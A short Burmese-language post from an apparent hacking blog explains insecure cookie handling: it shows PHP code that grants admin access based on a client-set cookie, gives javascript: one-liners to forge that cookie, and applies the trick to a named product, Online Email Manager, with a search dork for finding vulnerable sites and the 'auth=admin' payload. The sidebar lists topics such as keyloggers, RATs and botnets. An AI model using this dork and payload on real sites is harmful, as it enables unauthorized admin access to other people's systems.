Tuesday, July 31, 2012

Insecure Cookie Handling



Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါတယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။

Code


if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }

သူ႕မွာ  လြဲသြားတဲ့အေၾကာင္းအရာက "is_user_logged" ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ

javascript:document.cookie = "is_user_logged=1; path=/";

ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။

Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။

DorK : Powered by Online Email Manager

အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ

javascript:document.cookie = "auth=admin; path=/"; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )


ကိုသြားလိုက္ရံုနဲ႕  Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ

Ref : SirGod
post by negative thunder
copy from MHF

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology